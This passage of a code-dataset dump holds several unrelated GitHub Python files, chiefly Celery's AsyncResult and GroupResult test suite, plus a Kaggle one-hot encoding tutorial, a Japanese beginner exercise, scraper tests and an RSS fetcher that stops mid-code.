(Btemp[-1-L]).dot(W)\n W= (R[-2-L]).dot(weights[-1-L]).dot(W)\n\n B = sum(Btemp)\n return W,B,y\n","repo_name":"AndrewLouw/Saliency-Comparison","sub_path":"Mnist_net.py","file_name":"Mnist_net.py","file_ext":"py","file_size_in_byte":32566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9972588677","text":"# Read the data\nimport pandas as pd\ntrain_data = pd.read_csv('../input/train.csv')\ntest_data = pd.read_csv('../input/test.csv')\n\n# Drop houses where the target is missing\ntrain_data.dropna(axis=0, subset=['SalePrice'], inplace=True)\n\ntarget = train_data.SalePrice\n\n# Since missing values isn't the focus of this tutorial, we use the simplest\n# possible approach, which drops these columns.\n# For more detail (and a better approach) to missing values, see\n# https://www.kaggle.com/dansbecker/handling-missing-values\ncols_with_missing = [col for col in train_data.columns\n if train_data[col].isnull().any()]\ncandidate_train_predictors = train_data.drop(['Id', 'SalePrice'] + cols_with_missing, axis=1)\ncandidate_test_predictors = test_data.drop(['Id'] + cols_with_missing, axis=1)\n\n# "cardinality" means the number of unique values in a column.\n# We use it as our only way to select categorical columns here. 
This is convenient, though\n# a little arbitrary.\nlow_cardinality_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].nunique() < 10 and\n candidate_train_predictors[cname].dtype == \"object\"]\nnumeric_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].dtype in ['int64', 'float64']]\nmy_cols = low_cardinality_cols + numeric_cols\ntrain_predictors = candidate_train_predictors[my_cols]\ntest_predictors = candidate_test_predictors[my_cols]\n\n\n\n#Let's see a random sample of dtypes from our prediction data:\ntrain_predictors.dtypes.sample(10)\n\n\n#Pandas offers a convenient function called **get_dummies** to get one-hot encodings\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\n\n\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef get_mae(X, y):\n # multiple by -1 to make positive MAE score instead of neg value returned as sklearn convention\n return -1 * cross_val_score(RandomForestRegressor(50),\n X, y,\n scoring = 'neg_mean_absolute_error').mean()\n\npredictors_without_categoricals = train_predictors.select_dtypes(exclude=['object'])\n\nmae_without_categoricals = get_mae(predictors_without_categoricals, target)\n\nmae_one_hot_encoded = get_mae(one_hot_encoded_training_predictors, target)\n\nprint('Mean Absolute Error when Dropping Categoricals: ' + str(int(mae_without_categoricals)))\nprint('Mean Abslute Error with One-Hot Encoding: ' + str(int(mae_one_hot_encoded)))\n\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\none_hot_encoded_test_predictors = pd.get_dummies(test_predictors)\nfinal_train, final_test = one_hot_encoded_training_predictors.align(one_hot_encoded_test_predictors,\n join='left',\n axis=1)\n","repo_name":"Yasaman1997/Machine_Learning","sub_path":"Kaggle_ML/Projects/predict housing prices/Handling Missing Values/Using Categorical Data with One Hot Encoding.py","file_name":"Using Categorical Data with One Hot Encoding.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"3192457036","text":"# 演習0【前回の復習】\n# 整数を入力してもらう。\n# その整数が奇数の場合は「奇数です」と1度だけ出力する。\n# その整数が偶数の場合は「偶数です」と入力された数の回数出力する。\n# というプログラムを作成してください。\n# 例1)\n# 整数を入力してください:5\n# 結果:\n# 奇数です\nch = input(\"数字を入力してください\")\nnum = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\")\n# else:\n# print(\"偶数です\")\n\nif num % 2 == 0:\n count = num # 入力された値\n msg = \"偶数です\"\nelse:\n count = 1\n msg = \"奇数です\"\n\nfor i in range(count):\n print(msg)\n\n\n# 例2)\n# 整数を入力してください:4\n# 結果:\n# 偶数です\n# 偶数です\n# 偶数です\n# 偶数です\n# ch = input(\"整数を入力してください\")\n# num = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\" * num)\n# else:\n# print(\"偶数です\\n\" * num)\n\n\n# プログラムの流れも自分で考えてみましょう。\n# 難しい場合は、分かる部分からプログラムを書いてみましょう。\n","repo_name":"Masaru-DaL/School","sub_path":"term.1/PythonProgramming_a/2022.04.28/exercise0.py","file_name":"exercise0.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71708571848","text":"from __future__ import absolute_import\n\nfrom contextlib import contextmanager\n\nfrom celery import states\nfrom celery.exceptions import IncompleteStream, TimeoutError\nfrom celery.five import range\nfrom celery.result import (\n AsyncResult,\n EagerResult,\n TaskSetResult,\n result_from_tuple,\n)\nfrom celery.utils import 
uuid\nfrom celery.utils.serialization import pickle\n\nfrom celery.tests.case import AppCase, Mock, depends_on_current_app, patch\n\n\ndef mock_task(name, state, result):\n return dict(id=uuid(), name=name, state=state, result=result)\n\n\ndef save_result(app, task):\n traceback = 'Some traceback'\n if task['state'] == states.SUCCESS:\n app.backend.mark_as_done(task['id'], task['result'])\n elif task['state'] == states.RETRY:\n app.backend.mark_as_retry(\n task['id'], task['result'], traceback=traceback,\n )\n else:\n app.backend.mark_as_failure(\n task['id'], task['result'], traceback=traceback,\n )\n\n\ndef make_mock_group(app, size=10):\n tasks = [mock_task('ts%d' % i, states.SUCCESS, i) for i in range(size)]\n [save_result(app, task) for task in tasks]\n return [app.AsyncResult(task['id']) for task in tasks]\n\n\nclass test_AsyncResult(AppCase):\n\n def setup(self):\n self.task1 = mock_task('task1', states.SUCCESS, 'the')\n self.task2 = mock_task('task2', states.SUCCESS, 'quick')\n self.task3 = mock_task('task3', states.FAILURE, KeyError('brown'))\n self.task4 = mock_task('task3', states.RETRY, KeyError('red'))\n\n for task in (self.task1, self.task2, self.task3, self.task4):\n save_result(self.app, task)\n\n @self.app.task(shared=False)\n def mytask():\n pass\n self.mytask = mytask\n\n def test_compat_properties(self):\n x = self.app.AsyncResult('1')\n self.assertEqual(x.task_id, x.id)\n x.task_id = '2'\n self.assertEqual(x.id, '2')\n\n def test_children(self):\n x = self.app.AsyncResult('1')\n children = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'children': children, 'status': states.SUCCESS}\n x.backend = Mock()\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 3)\n\n def test_propagates_for_parent(self):\n x = self.app.AsyncResult(uuid())\n x.backend = Mock(name='backend')\n x.backend.get_task_meta.return_value = {}\n x.backend.wait_for.return_value = {\n 'status': states.SUCCESS, 'result': 84,\n }\n x.parent = EagerResult(uuid(), KeyError('foo'), states.FAILURE)\n with self.assertRaises(KeyError):\n x.get(propagate=True)\n self.assertFalse(x.backend.wait_for.called)\n\n x.parent = EagerResult(uuid(), 42, states.SUCCESS)\n self.assertEqual(x.get(propagate=True), 84)\n self.assertTrue(x.backend.wait_for.called)\n\n def test_get_children(self):\n tid = uuid()\n x = self.app.AsyncResult(tid)\n child = [self.app.AsyncResult(uuid()).as_tuple()\n for i in range(10)]\n x._cache = {'children': child}\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 10)\n\n x._cache = {'status': states.SUCCESS}\n x.backend._cache[tid] = {'result': None}\n self.assertIsNone(x.children)\n\n def test_build_graph_get_leaf_collect(self):\n x = self.app.AsyncResult('1')\n x.backend._cache['1'] = {'status': states.SUCCESS, 'result': None}\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x.iterdeps = Mock()\n x.iterdeps.return_value = (\n (None, x),\n (x, c[0]),\n (c[0], c[1]),\n (c[1], c[2])\n )\n x.backend.READY_STATES = states.READY_STATES\n self.assertTrue(x.graph)\n\n self.assertIs(x.get_leaf(), 2)\n\n it = x.collect()\n self.assertListEqual(list(it), [\n (x, None),\n (c[0], 0),\n (c[1], 1),\n (c[2], 2),\n ])\n\n def test_iterdeps(self):\n x = self.app.AsyncResult('1')\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'status': states.SUCCESS, 'result': None, 'children': c}\n for child in c:\n child.backend = Mock()\n child.backend.get_children.return_value = []\n it = x.iterdeps()\n 
self.assertListEqual(list(it), [\n (None, x),\n (x, c[0]),\n (x, c[1]),\n (x, c[2]),\n ])\n x._cache = None\n x.ready = Mock()\n x.ready.return_value = False\n with self.assertRaises(IncompleteStream):\n list(x.iterdeps())\n list(x.iterdeps(intermediate=True))\n\n def test_eq_not_implemented(self):\n self.assertFalse(self.app.AsyncResult('1') == object())\n\n @depends_on_current_app\n def test_reduce(self):\n a1 = self.app.AsyncResult('uuid', task_name=self.mytask.name)\n restored = pickle.loads(pickle.dumps(a1))\n self.assertEqual(restored.id, 'uuid')\n self.assertEqual(restored.task_name, self.mytask.name)\n\n a2 = self.app.AsyncResult('uuid')\n self.assertEqual(pickle.loads(pickle.dumps(a2)).id, 'uuid')\n\n def test_successful(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n\n self.assertTrue(ok_res.successful())\n self.assertFalse(nok_res.successful())\n self.assertFalse(nok_res2.successful())\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.successful())\n\n def test_str(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(str(ok_res), self.task1['id'])\n self.assertEqual(str(ok2_res), self.task2['id'])\n self.assertEqual(str(nok_res), self.task3['id'])\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(str(pending_res), pending_id)\n\n def test_repr(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(repr(ok_res), '<AsyncResult: %s>' % (\n self.task1['id']))\n self.assertEqual(repr(ok2_res), '<AsyncResult: %s>' % (\n self.task2['id']))\n self.assertEqual(repr(nok_res), '<AsyncResult: %s>' % (\n self.task3['id']))\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(repr(pending_res), '<AsyncResult: %s>' % (\n pending_id))\n\n def test_hash(self):\n self.assertEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x0w991')))\n self.assertNotEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x1w991')))\n\n def test_get_traceback(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n self.assertFalse(ok_res.traceback)\n self.assertTrue(nok_res.traceback)\n self.assertTrue(nok_res2.traceback)\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.traceback)\n\n def test_get(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok2_res = self.app.AsyncResult(self.task4['id'])\n\n self.assertEqual(ok_res.get(), 'the')\n self.assertEqual(ok2_res.get(), 'quick')\n with self.assertRaises(KeyError):\n nok_res.get()\n self.assertTrue(nok_res.get(propagate=False))\n self.assertIsInstance(nok2_res.result, KeyError)\n self.assertEqual(ok_res.info, 'the')\n\n def test_get_timeout(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with self.assertRaises(TimeoutError):\n res.get(timeout=0.001)\n\n pending_res = self.app.AsyncResult(uuid())\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n 
pending_res.get(timeout=0.001, interval=0.001)\n _time.sleep.assert_called_with(0.001)\n\n def test_get_timeout_longer(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n res.get(timeout=1, interval=1)\n _time.sleep.assert_called_with(1)\n\n def test_ready(self):\n oks = (self.app.AsyncResult(self.task1['id']),\n self.app.AsyncResult(self.task2['id']),\n self.app.AsyncResult(self.task3['id']))\n self.assertTrue(all(result.ready() for result in oks))\n self.assertFalse(self.app.AsyncResult(self.task4['id']).ready())\n\n self.assertFalse(self.app.AsyncResult(uuid()).ready())\n\n\nclass test_ResultSet(AppCase):\n\n def test_resultset_repr(self):\n self.assertTrue(repr(self.app.ResultSet(\n [self.app.AsyncResult(t) for t in ['1', '2', '3']])))\n\n def test_eq_other(self):\n self.assertFalse(self.app.ResultSet([1, 3, 3]) == 1)\n self.assertTrue(self.app.ResultSet([1]) == self.app.ResultSet([1]))\n\n def test_get(self):\n x = self.app.ResultSet([self.app.AsyncResult(t) for t in [1, 2, 3]])\n b = x.results[0].backend = Mock()\n b.supports_native_join = False\n x.join_native = Mock()\n x.join = Mock()\n x.get()\n self.assertTrue(x.join.called)\n b.supports_native_join = True\n x.get()\n self.assertTrue(x.join_native.called)\n\n def test_get_empty(self):\n x = self.app.ResultSet([])\n self.assertIsNone(x.supports_native_join)\n x.join = Mock(name='join')\n x.get()\n self.assertTrue(x.join.called)\n\n def test_add(self):\n x = self.app.ResultSet([1])\n x.add(2)\n self.assertEqual(len(x), 2)\n x.add(2)\n self.assertEqual(len(x), 2)\n\n @contextmanager\n def dummy_copy(self):\n with patch('celery.result.copy') as copy:\n\n def passt(arg):\n return arg\n copy.side_effect = passt\n\n yield\n\n def test_iterate_respects_subpolling_interval(self):\n r1 = self.app.AsyncResult(uuid())\n r2 = self.app.AsyncResult(uuid())\n backend = r1.backend = r2.backend = Mock()\n backend.subpolling_interval = 10\n\n ready = r1.ready = r2.ready = Mock()\n\n def se(*args, **kwargs):\n ready.side_effect = KeyError()\n return False\n ready.return_value = False\n ready.side_effect = se\n\n x = self.app.ResultSet([r1, r2])\n with self.dummy_copy():\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n list(x.iterate())\n _time.sleep.assert_called_with(10)\n\n backend.subpolling_interval = 0\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n ready.return_value = False\n ready.side_effect = se\n list(x.iterate())\n self.assertFalse(_time.sleep.called)\n\n def test_times_out(self):\n r1 = self.app.AsyncResult(uuid)\n r1.ready = Mock()\n r1.ready.return_value = False\n x = self.app.ResultSet([r1])\n with self.dummy_copy():\n with patch('celery.result.time'):\n with self.assertPendingDeprecation():\n with self.assertRaises(TimeoutError):\n list(x.iterate(timeout=1))\n\n def test_add_discard(self):\n x = self.app.ResultSet([])\n x.add(self.app.AsyncResult('1'))\n self.assertIn(self.app.AsyncResult('1'), x.results)\n x.discard(self.app.AsyncResult('1'))\n x.discard(self.app.AsyncResult('1'))\n x.discard('1')\n self.assertNotIn(self.app.AsyncResult('1'), x.results)\n\n x.update([self.app.AsyncResult('2')])\n\n def test_clear(self):\n x = self.app.ResultSet([])\n r = x.results\n x.clear()\n self.assertIs(x.results, r)\n\n\nclass MockAsyncResultFailure(AsyncResult):\n\n @property\n def 
result(self):\n return KeyError('baz')\n\n @property\n def state(self):\n return states.FAILURE\n\n def get(self, propagate=True, **kwargs):\n if propagate:\n raise self.result\n return self.result\n\n\nclass MockAsyncResultSuccess(AsyncResult):\n forgotten = False\n\n def forget(self):\n self.forgotten = True\n\n @property\n def result(self):\n return 42\n\n @property\n def state(self):\n return states.SUCCESS\n\n def get(self, **kwargs):\n return self.result\n\n\nclass SimpleBackend(object):\n ids = []\n\n def __init__(self, ids=[]):\n self.ids = ids\n\n def get_many(self, *args, **kwargs):\n return ((id, {'result': i, 'status': states.SUCCESS})\n for i, id in enumerate(self.ids))\n\n\nclass test_TaskSetResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = TaskSetResult(uuid(), make_mock_group(self.app, self.size))\n\n def test_total(self):\n self.assertEqual(self.ts.total, self.size)\n\n def test_compat_properties(self):\n self.assertEqual(self.ts.taskset_id, self.ts.id)\n self.ts.taskset_id = 'foo'\n self.assertEqual(self.ts.taskset_id, 'foo')\n\n def test_compat_subtasks_kwarg(self):\n x = TaskSetResult(uuid(), subtasks=[1, 2, 3])\n self.assertEqual(x.results, [1, 2, 3])\n\n def test_itersubtasks(self):\n it = self.ts.itersubtasks()\n\n for i, t in enumerate(it):\n self.assertEqual(t.get(), i)\n\n\nclass test_GroupResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = self.app.GroupResult(\n uuid(), make_mock_group(self.app, self.size),\n )\n\n @depends_on_current_app\n def test_is_pickleable(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts)), ts)\n ts2 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts2)), ts2)\n\n def test_len(self):\n self.assertEqual(len(self.ts), self.size)\n\n def test_eq_other(self):\n self.assertFalse(self.ts == 1)\n\n @depends_on_current_app\n def test_reduce(self):\n self.assertTrue(pickle.loads(pickle.dumps(self.ts)))\n\n def test_iterate_raises(self):\n ar = MockAsyncResultFailure(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n with self.assertRaises(KeyError):\n next(it)\n\n def test_forget(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.forget()\n for sub in subs:\n self.assertTrue(sub.forgotten)\n\n def test_getitem(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n self.assertIs(ts[0], subs[0])\n\n def test_save_restore(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.save()\n with self.assertRaises(AttributeError):\n ts.save(backend=object())\n self.assertEqual(self.app.GroupResult.restore(ts.id).subtasks,\n ts.subtasks)\n ts.delete()\n self.assertIsNone(self.app.GroupResult.restore(ts.id))\n with self.assertRaises(AttributeError):\n self.app.GroupResult.restore(ts.id, backend=object())\n\n def test_join_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n res = ts.join_native()\n self.assertEqual(res, 
list(range(10)))\n\n def test_join_native_raises(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ts.iter_native = Mock()\n ts.iter_native.return_value = iter([\n (uuid(), {'status': states.FAILURE, 'result': KeyError()})\n ])\n with self.assertRaises(KeyError):\n ts.join_native(propagate=True)\n\n def test_failed_join_report(self):\n res = Mock()\n ts = self.app.GroupResult(uuid(), [res])\n res.state = states.FAILURE\n res.backend.is_cached.return_value = True\n self.assertIs(next(ts._failed_join_report()), res)\n res.backend.is_cached.return_value = False\n with self.assertRaises(StopIteration):\n next(ts._failed_join_report())\n\n def test_repr(self):\n self.assertTrue(repr(\n self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ))\n\n def test_children_is_results(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertIs(ts.children, ts.results)\n\n def test_iter_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n self.assertEqual(len(list(ts.iter_native())), 10)\n\n def test_iterate_yields(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_iterate_eager(self):\n ar1 = EagerResult(uuid(), 42, states.SUCCESS)\n ar2 = EagerResult(uuid(), 42, states.SUCCESS)\n ts = self.app.GroupResult(uuid(), [ar1, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_join_timeout(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ar3 = self.app.AsyncResult(uuid())\n ts = self.app.GroupResult(uuid(), [ar, ar2, ar3])\n with self.assertRaises(TimeoutError):\n ts.join(timeout=0.0000001)\n\n ar4 = self.app.AsyncResult(uuid())\n ar4.get = Mock()\n ts2 = self.app.GroupResult(uuid(), [ar4])\n self.assertTrue(ts2.join(timeout=0.1))\n\n def test_iter_native_when_empty_group(self):\n ts = self.app.GroupResult(uuid(), [])\n self.assertListEqual(list(ts.iter_native()), [])\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n results = sorted(list(it))\n self.assertListEqual(results, list(range(self.size)))\n\n def test___iter__(self):\n self.assertListEqual(list(iter(self.ts)), self.ts.results)\n\n def test_join(self):\n joined = self.ts.join()\n self.assertListEqual(joined, list(range(self.size)))\n\n def test_successful(self):\n self.assertTrue(self.ts.successful())\n\n def test_failed(self):\n self.assertFalse(self.ts.failed())\n\n def test_waiting(self):\n self.assertFalse(self.ts.waiting())\n\n def test_ready(self):\n self.assertTrue(self.ts.ready())\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts))\n\n\nclass test_pending_AsyncResult(AppCase):\n\n def setup(self):\n self.task = self.app.AsyncResult(uuid())\n\n def test_result(self):\n self.assertIsNone(self.task.result)\n\n\nclass test_failed_AsyncResult(test_GroupResult):\n\n def setup(self):\n self.size = 11\n subtasks = make_mock_group(self.app, 10)\n failed = mock_task('ts11', states.FAILURE, 
KeyError('Baz'))\n save_result(self.app, failed)\n failed_res = self.app.AsyncResult(failed['id'])\n self.ts = self.app.GroupResult(uuid(), subtasks + [failed_res])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts) - 1)\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n\n def consume():\n return list(it)\n\n with self.assertRaises(KeyError):\n consume()\n\n def test_join(self):\n with self.assertRaises(KeyError):\n self.ts.join()\n\n def test_successful(self):\n self.assertFalse(self.ts.successful())\n\n def test_failed(self):\n self.assertTrue(self.ts.failed())\n\n\nclass test_pending_Group(AppCase):\n\n def setup(self):\n self.ts = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()),\n self.app.AsyncResult(uuid())])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), 0)\n\n def test_ready(self):\n self.assertFalse(self.ts.ready())\n\n def test_waiting(self):\n self.assertTrue(self.ts.waiting())\n\n def x_join(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=0.001)\n\n def x_join_longer(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=1)\n\n\nclass test_EagerResult(AppCase):\n\n def setup(self):\n\n @self.app.task(shared=False)\n def raising(x, y):\n raise KeyError(x, y)\n self.raising = raising\n\n def test_wait_raises(self):\n res = self.raising.apply(args=[3, 3])\n with self.assertRaises(KeyError):\n res.wait()\n self.assertTrue(res.wait(propagate=False))\n\n def test_wait(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.wait()\n self.assertEqual(res.state, states.RETRY)\n self.assertEqual(res.status, states.RETRY)\n\n def test_forget(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.forget()\n\n def test_revoke(self):\n res = self.raising.apply(args=[3, 3])\n self.assertFalse(res.revoke())\n\n\nclass test_tuples(AppCase):\n\n def test_AsyncResult(self):\n x = self.app.AsyncResult(uuid())\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n\n def test_with_parent(self):\n x = self.app.AsyncResult(uuid())\n x.parent = self.app.AsyncResult(uuid())\n y = result_from_tuple(x.as_tuple(), self.app)\n self.assertEqual(y, x)\n self.assertEqual(y.parent, x.parent)\n self.assertIsInstance(y.parent, AsyncResult)\n\n def test_compat(self):\n uid = uuid()\n x = result_from_tuple([uid, []], app=self.app)\n self.assertEqual(x.id, uid)\n\n def test_GroupResult(self):\n x = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)],\n )\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/celery/tests/tasks/test_result.py","file_name":"test_result.py","file_ext":"py","file_size_in_byte":24135,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"} +{"seq_id":"37360285773","text":"#coding: utf8\r\n\r\nimport unittest\r\nimport os\r\nfrom workers import cnbeta\r\n\r\nclass CnBetaTests(unittest.TestCase):\r\n\r\n def setUp(self):\r\n dir_name = os.path.dirname(os.path.realpath(__file__))\r\n with open(os.path.join(dir_name, \"testdata/cnbeta/1.txt\"), encoding='utf8') as f:\r\n self.text_data = f.read()\r\n\r\n def test_get_comments_details(self):\r\n details = cnbeta.get_comments_details(self.text_data)\r\n self.assertIsNotNone(details)\r\n 
self.assertEqual(2, len(details))\r\n self.assertEqual(\"270774\", details[0])\r\n self.assertEqual(\"4f299\", details[1])\r\n\r\n def test_get_op_code(self):\r\n op_code = cnbeta.get_op_code(\"270774\", \"4f299\", 1)\r\n self.assertEqual(\"MSwyNzA3NzQsNGYyOTk=1234567\", op_code)\r\n\r\n def test_get_comments(self):\r\n op_code = \"MSwyNzA2NTAsYTYwMWI%3DuscCHONc\"\r\n comments = cnbeta.get_comments(op_code)\r\n self.assertIsNotNone(comments)\r\n\r\n def test_get_article_list(self):\r\n article_list = cnbeta.get_article_list(1)\r\n self.assertIsNotNone(article_list)\r\n self.assertEqual(30, len(article_list))\r\n","repo_name":"Syndim/NewsReader","sub_path":"website/tests/workers/cnbeta.py","file_name":"cnbeta.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20899756132","text":"import sys\n\n\ndef menu(userinput):\n while userinput is not 'q':\n if userinput == '1':\n print(userinput)\n if userinput == '2':\n print(userinput + str(2))\n if userinput == 'q':\n sys.exit(0)\n print(\"1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n\n\ndef test():\n print(\"\\n1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n if userinput == 'q':\n sys.exit(0)\n menu(userinput)\n\n\nif __name__ == '__main__':\n test()","repo_name":"bikash0109/Python-Progs","sub_path":"first sem/Lab7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22916037464","text":"import sys\r\n\r\nsys.stdin = open(\"b1.in\", \"r\")\r\n#sys.stdout = open(\"b1.out\", \"w\")\r\nT = int(input())\r\n\r\n#B1\r\ndef rec(N):\r\n if N == 1:\r\n return 0\r\n if N % 3 == 0:\r\n Y, Z = N / 3, 2 * N / 3\r\n return int(Y * Z) + rec(Y) + rec(Z)\r\n elif N % 2 == 0:\r\n return int((N/2)**2) + rec(N/2)\r\n else:\r\n return int(N - 1) + int(rec(N - 1))\r\n\r\nfor _ in range(T):\r\n input()\r\n N = int(input())\r\n print(rec(N))\r\n","repo_name":"aajjbb/contest-files","sub_path":"IPSC/BoredomBusters.py","file_name":"BoredomBusters.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"28160671378","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport feedparser\nimport os\nimport re\n\nclass RssFetcher():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n delPattern = re.compile(\"<a.*?>\")\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n reSummary = re.sub(\"<img.*?>\", '', ''.join(rssEntries[i]['summary'].split('\\n')))\n reSummary = re.sub(\"<a.*?>\", '', reSummary)\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\nclass RssFetcher1():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n summary_pattern = re.compile(\"<p>(.*?)</p>\", re.S)\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n if not re.findall('<p>', rssEntries[i]['summary']) == []:\n reSummary = '{enter}'.join(summary_pattern.findall(rssEntries[i]['summary']))\n else: reSummary = rssEntries[i]['summary']\n 
